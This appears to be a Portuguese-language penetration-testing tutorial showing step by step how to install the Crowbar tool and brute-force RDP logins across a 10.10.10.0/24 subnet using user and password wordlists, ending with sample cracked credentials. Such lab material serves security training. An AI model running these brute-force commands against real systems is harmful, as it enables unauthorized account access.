O CROWBAR é uma ferramenta de força bruta muito útil durante um PenTest, de acordo com os desenvolvedores seu diferencial esta na utilização de chaves SSH que para atacar outros servidores SSH. | ||
Projeto : github.com/galkan/crowbar | ||
01 — Passo | ||
Baixe a versão mais atual utilizando o git. | ||
git clone https://github.com/galkan/crowbar | ||
02 — Passo | ||
Entre no diretório crowbar e liste os arquivos. | ||
cd crowbarls -l | ||
03 — Passo | ||
Crie um arquivo usuarios.txt e adicione alguns usuários que possivelmente possa existir nos equipamentos da rede. | ||
vim usuarios.txt | ||
04 — Passo | ||
Crie um arquivo senha.txt e adicione algumas senhas que possivelmente possam ser dos usuários existentes nos equipamentos da rede. | ||
vim senhas.txt | ||
05 — Passo | ||
Atribua a permissão 777 para o arquivo crowbar.py e visualize a permissão atribuída. | ||
chmod 777 crowbar.pyls -l | ||
06 — Passo | ||
Para que possa executar o crowbar.py algumas dependências são necessárias, basta instalar os pacotes a seguir: | ||
apt-get install openvpn freerdp-x11 vncviewer | ||
07 — Passo | ||
Execute os crowbar seguido dos parâmetros abaixo para realizar o brute force. | ||
./crowbar.py -b rdp -s 10.10.10.0/24 -U usuarios.txt -C senhas.txt -d | ||
08 — Passo | ||
Dois novos arquivos serão gerados: | ||
crowbar.log : Contém todas as tentativas de Usuários/Senhas realizados nos equipamentos. | ||
ls -l | ||
09 — Passo | ||
Servidor: 10.10.10.20 — Usuário: Administrator — Senha: P@ssw0rd | ||
Servidor: 10.10.10.140 — Usuário: 100security — Senha: 123456 | ||